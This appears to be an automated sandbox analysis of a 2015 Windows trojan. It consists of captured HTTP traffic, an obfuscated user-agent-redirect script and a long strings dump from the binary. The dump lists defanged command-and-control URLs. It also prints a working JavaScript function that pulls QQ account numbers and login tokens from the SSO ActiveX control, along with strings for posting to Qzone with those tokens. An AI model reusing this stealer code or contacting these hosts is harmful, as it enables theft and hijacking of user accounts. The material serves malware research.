X-Via: 1.1 zjjhdx31:8104 (Cdn Cache Server V2.0), 1.1 kf49:3 (Cdn Cache Server V2.0)

Connection: keep-alive
GIF89a6...........A....v..........................z......=..p..?.....|
.................~..|..D.....o.{...q.w......:........>[email protected].
..........o..5..?.....>................{...............a.....l..n..
}..{...........|..;..B.....n..<.....?........?...........{..q.....m
..B..|...........>..~..=.....x...........o..d........a..9........6.
.:...........z...........>..n..|..?........q..p.....y.....;........
...b...........}.z...;..?..}.....A....................>...........&
lt;.....>..4.....d.....>..6..>..o..C.w.......................
......................................................................
......................................................................
......................................................................
.........................................!.......,....6.......K.,.....
[email protected]"H.p...c....TJ..b....@\. A..0e2.is.'K.:A.0HP
.D...iR...2.*,)..L.3.F.8..K..M.F.Z.j..].H.....G...*. ...5n.. ....B(.y.
%...v...../`.........=.6E.PJK.5U....B..R....a.G..L:..=.....[..-.....Fm
.0PJ..(...!a...F...^.x....>.>.x.P...~.0.....,.Q2'K...]....@..$..
g...@[email protected]`[email protected]).f.a..QB.!.-..&....
...1....1....1..1.X..9........;..
<<< skipped >>>

GET /gundong/index.html HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: memeda528.32.5vv.cc

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Length: 961

Content-Type: text/html

Content-Encoding: gzip

Last-Modified: Sun, 21 Jun 2015 05:09:23 GMT

Accept-Ranges: bytes

ETag: "80c3c56fe0abd01:a09d4"

Vary: Accept-Encoding

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Mon, 20 Jul 2015 17:06:41 GMT
...........X.N.Y.}.d......s..k...|..6!....A.h.B.tC....../...y.7...`.t.
...s.].....W..k...:...w.........G.[.G....n......7...o9.z....y....^....
......T..o.....^.I.....5..C.yo6OB. A]........!.I%l...>...8.. ......
..s.|v>.I....r..(4S],kPId...'`.6.......K........T..).....w.]..$V9Q.
D...(...\.X.....v..Zg~..\.#.jy....*...4...Q._$..;.V.....'.Z.mE..2[x..-
....D.d..../P.J.......HP........Yp*.y.~............3-..e....Q.......HG
Y...o.."...\..b.. p<..n....g~.HbNmn..E7.....$...G..&>P.w.v....N.
...p.BW.Z'*.uy..6*..\..^.W.#.w..13..n.U.iQ.:..../p.O.x3...Y.q...-C....
8pgR;R..X.5 S...F%2.p...Gp6..&.\f"................W..O.}.....$Q..7WW..
.B .....I..z.=qT......[.0..,..eW..4....Rc.dI....D..}.=.v..a.D.en.$uC..
.Tq.......~6Z...MWU.B........... ..[.#'.....$..c.U.S ..R.,~...i....Y..
a......$}.6.7..w.|..lbx2...K.....o..........A.M ....A......['n..TD_...
....$....JY.....}.h../........d..=.}.l..`=...{...... u!.E.v}.J.(.../=.
..3`.u.'[.....3`...$.....2.p.g.....a....20].ILy.F.cw.../.e'....HTTP/1.
1 200 OK..Content-Length: 961..Content-Type: text/html..Content-Encodi
ng: gzip..Last-Modified: Sun, 21 Jun 2015 05:09:23 GMT..Accept-Ranges:
 bytes..ETag: "80c3c56fe0abd01:a09d4"..Vary: Accept-Encoding..Server: 
Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Mon, 20 Jul 2015 17:06
:41 GMT.............X.N.Y.}.d......s..k...|..6!....A.h.B.tC....../...y
.7...`.t....s.].....W..k...:...w.........G.[.G....n......7...o9.z....y
....^..........T..o.....^.I.....5..C.yo6OB. A]........!.I%l...>...8
.. ........s.|v>.I....r..(4S],kPId...'`.6.......K........T..)..
<<< skipped >>>

GET /stat.php?id=1255320825&show=pic HTTP/1.1

Accept: */*

Referer: hXXp://VVV.qb123456.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s11.cnzz.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Tengine

Content-Type: application/javascript

Transfer-Encoding: chunked

Connection: keep-alive

Date: Mon, 20 Jul 2015 17:04:47 GMT

Last-Modified: Mon, 20 Jul 2015 17:04:47 GMT

Cache-Control: max-age=5400,s-maxage=5400

Via: cache35.l2de1[697,200-0,M], cache26.l2de1[698,0], cache4.de1[698,200-0,M], cache1.de1[699,0]

X-Cache: MISS TCP_REFRESH_MISS dirn:5:480716714

X-Swift-SaveTime: Mon, 20 Jul 2015 17:04:47 GMT

X-Swift-CacheTime: 5400
3f2..(function(){function k(){this.c="1255320825";this.R="z";this.N="p
ic";this.K="";this.M="";this.r="1437411887";this.P="oz.cnzz.com";this.
L="";this.u="CNZZDATA" this.c;this.t="_CNZZDbridge_" this.c;this.F="_c
nzz_CV" this.c;this.G="CZ_UUID" this.c;this.v="0";this.A={};this.a={};
this.la()}function g(a,b){try{var c=.[];c.push("siteid=1255320825");c.
push("name=" f(a.name));c.push("msg=" f(a.message));c.push("r=" f(h.re
ferrer));c.push("page=" f(e.location.href));c.push("agent=" f(e.naviga
tor.userAgent));c.push("ex=" f(b));c.push("rnd=" Math.floor(2147483648
*Math.random()));(new Image).src="hXXp://jserr.cnzz.com/log.php?" c.jo
in("&")}catch(d){}}var h=document,e=window,f=encodeURIComponent,l=deco
deURIComponent,n=unescape;k.prototype={la:function(){try{this.U(),this
.J(),this.ia(),this.H(),this.o(),this.ga(),.this.fa(),this.ja(),this.j
(),this.ea(),this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.pa
(),e[this.t]=e[this.t]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed"
)}},na:function(){try{var a=this;e...22e6.._czc={push:function(){retur
n a.B.apply(a,arguments)}}}catch(b){g(b,"oP failed")}},aa:function(){t
ry{var a=e._czc;if("[object Array]"==={}.toString.call(a))for(var b=0;
b<a.length;b  ){var c=a[b];switch(c[0]){case "_setAccount":e._cz_ac
count="[object String]"==={}.toString.call(c[1])?c[1]:String(c[1]);.br
eak;case "_setAutoPageview":"boolean"===typeof c[1]&&(e._cz_autoPagevi
ew=c[1])}}}catch(d){g(d,"cS failed")}},pa:function(){try{if("undefined
"===typeof e._cz_account||e._cz_account===this.c){e._cz_account=th
<<< skipped >>>

GET /?WebShieldDRSessionVerify=IAMEPrbNNhN4I9Ma9Ltt HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.qb123456.com

Connection: Keep-Alive

HTTP/1.1 302 Found

Server: Safedog/4.0.0

Location: /

Content-Length: 0

Connection: Close

Content-Type: text/html

GET /app.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.qb123456.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.5187789.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Length: 2498

Content-Type: application/x-javascript

Last-Modified: Tue, 14 Jul 2015 04:39:56 GMT

Accept-Ranges: bytes

ETag: "ac33622efbdd01:f98"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Mon, 20 Jul 2015 17:04:33 GMT
var _$ = ["bod_app", "", "", '\x54\x72\x69\x64\x65\x6e\x74', '\x50\x72
\x65\x73\x74\x6f', '\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74', '\x
47\x65\x63\x6b\x6f', '\x4b\x48\x54\x4d\x4c', '\x41\x6e\x64\x72\x6f\x69
\x64', '\x4c\x69\x6e\x75\x78', '\x69\x50\x68\x6f\x6e\x65', '\x69\x50\x
61\x64', '\x53\x61\x66\x61\x72\x69', "hXXp://VVV.5187789.com/ad/index.
html?", 'hXXp://VVV.5187789.com/ios/index.html?', ''];..//aad/ad.html?
--................//ios/ios.html?-------................//............
................var a = window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x
67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64"](_$[0])["\x73\
x72\x63"];..var b = a["\x73\x70\x6c\x69\x74"](_$[1])[0x1]   _$[2];..va
r c = {..versions: function() {..    var d = navigator["\x75\x73\x65\x
72\x41\x67\x65\x6e\x74"],..    e = navigator["\x61\x70\x70\x56\x65\x72
\x73\x69\x6f\x6e"];..    return {..        trident: d["\x69\x6e\x64\x6
5\x78\x4f\x66"](_$[3]) > -0x1,..        presto: d["\x69\x6e\x64\x65
\x78\x4f\x66"](_$[4]) > -0x1,..        webKit: d["\x69\x6e\x64\x65\
x78\x4f\x66"](_$[5]) > -0x1,..        gecko: d["\x69\x6e\x64\x65\x7
8\x4f\x66"](_$[6]) > -0x1 && d["\x69\x6e\x64\x65\x78\x4f\x66"](_$[7
]) == -0x1,..        mobile: !!d["\x6d\x61\x74\x63\x68"](/AppleWebKit.
*Mobile.*/),..        ios: !!d["\x6d\x61\x74\x63\x68"](/\(i[^;] ;( U;)
? CPU. Mac OS X/),..        android: d["\x69\x6e\x64\x65\x78\x4f\x66"]
(_$[8]) > -0x1 || d["\x69\x6e\x64\x65\x78\x4f\x66"](_$[9]) > -0x
1,..        iPhone: d["\x69\x6e\x64\x65\x78\x4f\x66"](_$[10]) >
<<< skipped >>>

GET /app.gif?&cna=MRg0DmUdX3ECAcGK9OdBjXql HTTP/1.1

Accept: */*

Referer: hXXp://VVV.qb123456.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Connection: Keep-Alive

Host: pcookie.cnzz.com

HTTP/1.1 200 OK

Server: Tengine

Date: Mon, 20 Jul 2015 17:04:52 GMT

Content-Type: image/gif

Content-Length: 43

Connection: keep-alive

P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"

Set-Cookie: cna=MRg0DmUdX3ECAcGK9OdBjXql; expires=Thu, 17-Jul-25 17:04:52 GMT; path=/; domain=.cnzz.com

Expires: Thu, 01 Jan 1970 00:00:01 GMT

Cache-Control: no-cache

Pragma: no-cache
GIF89a.............!.......,...........L..;HTTP/1.1 200 OK..Server: Te
ngine..Date: Mon, 20 Jul 2015 17:04:52 GMT..Content-Type: image/gif..C
ontent-Length: 43..Connection: keep-alive..P3P: CP="NOI DSP COR CURa A
DMa DEVa PSAa PSDa OUR IND UNI PUR NAV"..Set-Cookie: cna=MRg0DmUdX3ECA
cGK9OdBjXql; expires=Thu, 17-Jul-25 17:04:52 GMT; path=/; domain=.cnzz
.com..Expires: Thu, 01 Jan 1970 00:00:01 GMT..Cache-Control:..

GET / HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.qb123456.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Length: 1191

Content-Type: text/html

Content-Encoding: gzip

Content-Location: hXXp://VVV.qb123456.com/index.htm

Last-Modified: Fri, 17 Jul 2015 22:43:21 GMT

Accept-Ranges: bytes

ETag: "804a4cfbe1c0d01:14e5f"

Vary: Accept-Encoding

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Mon, 20 Jul 2015 17:04:23 GMT
...........U[O.G.~6..a:..-.]_0........Q.*....k{.zw.;...q,.Z...6..`..`.
..!..>4.-...!..U.:.......~....s..|..Y....C..6....6p9....l6.2c\.D.).
..........I...E.)"...FN...........K_m..Mt....1......hB..0"...a..0....3
...6...<.OF^.b..."%.....I..KW.......i........T...>...4"\........
Ny....i...=..r........La}s.. .......q..zX.QGZy..4./|G\s..L.../.7.k.Z.x
..3..........*.*...tc.`...s..."....E.....,V.IC....M..b.b.4....}s.....e
_.^VV7....L.1F..,.|[email protected]?...
..6.OE.$FO.yL.^].s.:.....)\..c....N&..G!......X)N;...C............Fu.Q
...Tyi.X...c..4.h....?.".F{..3....._m....s.........&.y...!..R>.i...
(P...........z.(..9..3QN..*......h.S&...../.b.........vP....V/....ry.4
.x.|.........A..T.....7C~[....F.HTTP/1.1 200 OK..Content-Length: 1191.
.Content-Type: text/html..Content-Encoding: gzip..Content-Location: ht
tp://VVV.qb123456.com/index.htm..Last-Modified: Fri, 17 Jul 2015 22:43
:21 GMT..Accept-Ranges: bytes..ETag: "804a4cfbe1c0d01:14e5f"..Vary: Ac
cept-Encoding..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date:
 Mon, 20 Jul 2015 17:04:23 GMT.............U[O.G.~6..a:..-.]_0........
Q.*....k{.zw.;...q,.Z...6..`..`...!..>4.-...!..U.:.......~....s..|.
.Y....C..6....6p9....l6.2c\.D.)...........I...E.)"...FN...........K_m.
.Mt....1......hB..0"...a..0....3...6...<.OF^.b..."%.....I..KW......
.i........T...>...4"\........Ny....i...=..r........La}s.. .......q.
.zX.QGZy..4./|G\s..L.../.7.k.Z.x..3..........*.*...tc.`...s..."....E..
...,V.IC....M..b.b.4....}s.....e_.^VV7....L.1F..,.|...2......q..v.
<<< skipped >>>

GET /img/pic.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.qb123456.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: icon.cnzz.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Tengine

Content-Type: image/gif

Content-Length: 719

Connection: keep-alive

Date: Mon, 20 Jul 2015 08:47:43 GMT

Last-Modified: Thu, 12 Feb 2015 08:15:09 GMT

Expires: Tue, 21 Jul 2015 08:47:43 GMT

Cache-Control: max-age=86400

Accept-Ranges: bytes

Via: cache1.l2de1[866,304-0,H], cache34.l2de1[867,0], cache1.de1[0,200-0,H], cache7.de1[0,0]

Age: 29825

X-Cache: HIT TCP_MEM_HIT dirn:3:133224929

X-Swift-SaveTime: Mon, 20 Jul 2015 08:47:43 GMT

X-Swift-CacheTime: 86400
GIF89a2.........f..3...33.............................................
.......................................!..NETSCAPE2.0.....!..Powered b
y AFEI.!.......,....2...... !.di.hjBl..p,....x......`P.(...GR.D6...CH.
...,..@8.... -..EQc.8...........`...."....................~"..H.......
.H......"...$....#.........."..........."Z.......*...%!.!.......,....2
...... !.di.hjBl..p,....x..|....p r..H.C.\&.H.tJu...#b......7..W.h....
...7..l..v..-....."....................~"..I........I......"...$....#.
........."..........."\.......*...%!.!.......,....2...... !.di.hjBl..p
,....x..|....p r..H.C.\&.H.tJu...#b......7..W.h.......7..l..v..-....."
....................~"..I........I......"...$....#..........".........
.."\.......*...%!.;HTTP/1.1 200 OK..Server: Tengine..Content-Type: ima
ge/gif..Content-Length: 719..Connection: keep-alive..Date: Mon, 20 Jul
 2015 08:47:43 GMT..Last-Modified: Thu, 12 Feb 2015 08:15:09 GMT..Expi
res: Tue, 21 Jul 2015 08:47:43 GMT..Cache-Control: max-age=86400..Acce
pt-Ranges: bytes..Via: cache1.l2de1[866,304-0,H], cache34.l2de1[867,0]
, cache1.de1[0,200-0,H], cache7.de1[0,0]..Age: 29825..X-Cache: HIT TCP
_MEM_HIT dirn:3:133224929..X-Swift-SaveTime: Mon, 20 Jul 2015 08:47:43
 GMT..X-Swift-CacheTime: 86400..GIF89a2.........f..3...33.............
......................................................................
.!..NETSCAPE2.0.....!..Powered by AFEI.!.......,....2...... !.di.hjBl.
.p,....x......`P.(...GR.D6...CH....,..@8.... -..EQc.8...........`...."
....................~"..H........H......"...$....#..........".....
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

.text

`.rdata

@.data

.rsrc

t$(SSh

~%UVW

u$SShe

wininet.dll

ole32.dll

kernel32.dll

hXXp://cf.2015cc.cc/gugu/

get.php?qq=

hXXp://VVV.1qb.ys168.com

hXXp://id.qq.com/

id.qq.com

&src_uin=VVV.feifeiboke.com&fid=blog&spec=100

hXXp://q.qlogo.cn/headimg_dl?bs=qq&dst_uin=

index.php

gugu.php?id=

hXXp://yuntv.letv.com/bcloud.html?uu=5612b0250f&vu=b00f0ee22b&auto_play=1&gpcflag=1&width=960&height=650

hXXp://

WinHttp.WinHttpRequest.5.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Content-Type: application/x-www-form-urlencoded

hXXp://VVV.waqiang.com/index.php/url/shorten

hXXps://

hXXp://1111.ip138.com/ic.asp

hXXp://VVV.52zswl.com/gg.asp

5w.wyh

atl.dll

user32.dll

HttpOpenRequestA

HttpSendRequestA

HttpQueryInfoA

MsgWaitForMultipleObjects

&keyindex=9&pt_aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone

&clientkey=

hXXp://ptlogin2.qq.com/jump?clientuin=

hXXp://qzs.qq.com/qzone/v5/loginsucc.html?para=izone

skey

hXXp://dwz.cn/Rsusk

#home&syn_tweet_verson=1&richtype=&richval=&special_url=&subrichtype=&who=1&con=qm

qzreferrer=http://user.qzone.qq.com/

hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=

SSOAxCtrlForPTLogin.SSOForPTLogin2

hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin

document.body.innerHTML=GetuinKey();

function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g<f;g  ){var E=V.GetData(g);var P=E.GetDWord("dwSSO_Account_dwAccountUin");var U=E.GetStr("strSSO_Account_strNickName");var G=E.GetBuf("bufST_PTLOGIN");var A=G.GetSize();var N="";for(var Y=0;Y<A;Y  ){var B=G.GetAt(Y).toString("16");if(B.length==1){B="0" B};N =B};text =P '|' U '|' N ';'}}catch(b){}};return text};

Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

http=

https

HTTP/1.1

len = str.length; i < len;   i) hash  = (hash << 5)   str.charCodeAt(i);

var t = QZONE.FormSender;

if (t && t.pluginsPool) t.pluginsPool.formHandler.push(function(fm) {

var a = QZFL.string.trim(fm.action);

a  = (a.indexOf("?") > -1 ? "&": "?")   "g_tk="   QZFL.pluginsDefine.getACSRFToken();

fm.action = a

%d&&'

123456789

00003333

deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly

inflate 1.1.3 Copyright 1995-1998 Mark Adler

F%*.*f

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

__MSVCRT_HEAP_SELECT

Broken pipe

Inappropriate I/O control operation

Operation not permitted

iphlpapi.dll

SHLWAPI.dll

MPR.dll

WINMM.dll

WS2_32.dll

VERSION.dll

GetProcessHeap

WinExec

KERNEL32.dll

GetKeyState

USER32.dll

GetViewportOrgEx

GDI32.dll

WINSPOOL.DRV

RegCloseKey

RegOpenKeyExA

RegCreateKeyExA

ADVAPI32.dll

ShellExecuteA

SHELL32.dll

OLEAUT32.dll

COMCTL32.dll

WININET.dll

GetCPInfo

CreateDialogIndirectParamA

UnhookWindowsHookEx

SetWindowsHookExA

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

GetViewportExtEx

comdlg32.dll

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

Kernel32.dll

.PAVCException@@

(&07-034/)7 '

?? / %d]

%d / %d]

.PAVCFileException@@

: %d]

(*.*)|*.*||

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|PNG

(*.PNG)|*.PNG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

%s:%d

windows

.PAVCNotSupportedException@@

out.prn

(*.prn)|*.prn|

%d.%d

%d/%d

1.6.9

unsupported zlib version

png_read_image: unsupported transformation

%d / %d

Bogus message code %d

libpng error: %s

libpng warning: %s

1.1.3

bad keyword

libpng does not support gamma background rgb_to_gray

Palette is NULL in indexed image

(%d-%d):

%ld%c

VVV.dywt.com.cn

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCArchiveException@@

zcÁ

#include "l.chs\afxres.rc" // Standard components

PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX\2345explorer_k43181459.exe

`j.PW8

@B*%C

HM.il

.lfsU[$M>

h--w}6j

0xXJK{

.Em7/

Windows

uN'yQ.uA

8Te8Rc7Oc3Nc.Ne,Nf Jc'F]-@O/9@74

_hkEy

5IZ4HZ0FX.EU0BS.@Q)AM @O$=Q#;Q!9

.CX(G^oO,

`.rda

version="1.3.0.1307"

<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*"/>

<requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges>

KERNEL32.DLL

msvcrt.dll

RunProgram="\"p7_k43181459_ihaJ6SGgL6cCje0drNf3dVQQJKJP.exe\" "

Delete="%%T\\p7_k43181459_ihaJ6SGgL6cCje0drNf3dVQQJKJP.exe"

fB:(t.HV

.oR6F

qh.eg

Q$.oD

&KPeQ,c'.lq

Qw.btr

.mku;

M7.YB

fcRT

{q.QJS

u*.YR

0.lk(

S.AeUI

%uc@WC

{k%XL

#%xV:c

&%XhZ

Y,=<m6 ^.AS

/%x8V

?[%xz

|.VD)

SJ.tT

n] .az

W%D-5

%e.tLN

Z^.Td

.COr'

.Efz?

Z.Jo_

wEbf5

Ë=s`

m-.NSR

4.Yd/

*V%fiP

L8.YL

!3.Ny:]

B{.Vjy

s.nF$

"j.Ak

*J%F$Vj

uM.NP

h]s%F

.CCNt

9.pS,S

cH-3K}

h|%FU

Q.MdZ7

-3c%D

<Är:U

ssV%u

0c.zH

N%CY"v

c9BkeY=

.jM-e

RK`SQl

j.zT{

e.ke0

^4.fZ]

F}.dP

%f.o.

RC.Kqa

E]AyÓ

4Ez2y.ih

.QveBl

19p.Jg

.rPra

U6H2@%Dv

q.Xyx

[y%F%

Cx.JV

V.Wn_

.of*S.

d.QTh,h

\`W.zy0

i*.zc

k.AXK

%U}N#B

*.NaJ

0.hh:

N.pMPo

w>J%f

`\hÑ

z%d?.7H

%xTiU

.vr!a

SWeE.Th

H%Cv 

k.hX)

N.yZz#

.lE(U

b(

%UPwe72

4Àe8C

\5-8}

H$.jEzHq|w%

q[%Um

EEe%f

hR.aW8

Gsql=5#

.JJOM

-J%D'#G

0e%X@

$/.hgo

J/.fYv

.uW']/

g;zvd>.cj

c%fKJA

]V.QP P

qs.RkF)

'HL6.ycRL:7

,-m.ne

<0F3m|%s

b%c*V

l".YE

.wgt$

>.Zf=

uÂP

B%u17

.Tc1w

.^#h].jt

bR.Fd

z.INa

LN-M}

P0g%D

=%fH,

%CIJ|xg

!>.aX

_%fI-

5WA.nA

V`.qp

({%UHSP

%x^t]

".hk0

.BSq)

m|.jT

9b.px

1%Q.oA

R.qwou

<.pE`

%x#7}

:c>*;%S

6.RvEl

|\.Ta:|

5gb%F

PKn%U

0^P)%UG9@

.HH'Q

.cI3"

A-%f]?{

.gf/C

e:\HZ

%u]OL

#.eIM

fiZ%dI$

y%X`t

x5"\[G%C;z

2g%f#

ZOS^%Uy

].EY{

.OW1k*

.iM>IZ

fqJ%u

Di>O$.PG

<^H.nuJmq

%dRn5

1.Awu

CvW%xVAKM

;.ZT>

.smnQ3

%f`tea

-U}El

YL(p%X

x6.YyN

miJQ%U

k.OZo

5xDtCp

C/T%X3FE

%cZhkYv

N.hYX

p.LN%)

W!.Gg

M%s79

=^_.pr

0E%FJ

UL%9S

l%se3

%s7~Y

-G.Oq/

$.DbC

.coif

Ph%d 

{..JT[ox

%S .x

.XuHW

. t%U_ v)

ImsG

T%fGI*

j.GIaPt

.fu7v

^.rzU

J%co'`

%f:{$

ZrM%C

TWX%U>aX

vC.oy

}9.rT

w$T)%fn

0E.eS

'V.eH

i%dk$z

.DP|O

g\.MKk

V .CB

kE.jP

HOu%c

If.fj

4 .qqVN

.gx\V

_'.%dK

.lplgl

.Yp:qN

.LhM-

].BgQ

hn[.Vl

_%8xd

)@9d3

ja2fj.SJFg

waB.wY

Y.Tc?X3

 4.aq%cM

8_.gk

:\.ip

5$%d_

Kg{%f

i.po&

g.Ec_w

N7.AP

fTcp

Fl).KZ6O1

.RI6:

0.dn/

2.TMZ

.vDjsi

=.mi8

0-Hu}

zqwEBDI

B<.cZ

6Í.

W%f};

W?%.f

HVi%u

.Kb~f

B8".MS

.yM;rq

_%f`*

%[B%dV,

|%D[/o

y.cm)J

P%.c`>

%.YH4

-.uQu

~%U9 kN

.gf9-!

0.FT9T

|Tg%f

@.aL^nc)

3=.Gc

D~aa7%3uk)

.Us30

V.ajB

8N.kW

.mXc!Y]

T0N e.tZ

1x%up

[BA%Cv

F6%x,

.hZ&/

.gL&C6

4ŒK

"RpDoÞK

Y#%CKf

*%S6X

7.Uq6

W],.OA

S'&.jw

c.hl]

%D\hL

]z-b}Hh

zD8.Em

6>tÍ

t.Gk@]y

)$*%S

h.hz C

_tb:(J

;l*.ohq

&g}

.fR7|

ae.Oe8

-I}Q(

.Mi}a

y%U!W

@"%6S/

2F.nh

p2*%d

g#%C=

P z.JK

AA.Tu

y.DS['

Dj%c^

J.Qm"

ÂV@kb

@%c!('=

d.Sz9

-ro}QS

}._a%f

^rX%u

.OX-8

.zwYb

%S \B.VE%J

.ZFM9?

%s0<j

z%XbZXYq

.iJIbG

o.lA"

.HP^g@cj

Q.nYa

U_.rFc

qE

-0BB}o

.RN`[1I

#x-0}8

H.wA',

ON)3.BW

Y.Dlg

>lX %uO

i.CK(

$.dOA

kouD%D*

|.OTv

.Af9g

.aYy*

8%s/;|3

.lx3q

JwÝ

|%Uue

cEÅ

.pWQ#B

)=-E}

.CdEz

S.MsY

ozo%d!

x.Dw,Y

=.mXD

RA%Ut

`%UUn

o.cSO

$%6ud0=

m.Ud"&

.bAZW

]F%9X

V.Wuc

lE.YSe

%xa@lJ,)

5.JxBg

Z=.ZRx%

' p^%c

RurLV/

%s;2]

"nL.VE 

ln%FR%

%fR"O

=D.MJ

'}%xL<6%

.ph'P

9.Ke7l

.Es(Fc

b.yS%

B?Z%C@

.hh@G

.SMge?

H/U.mZ

Ke.Cz7

F.yMYO

'U%X!u

.Vxj|

.Jr87K

c.QE4;O

P.ea)Hz

>e%fj\' P

^#.IQ

.hFh#

s.dzL

@.PP!6Qz

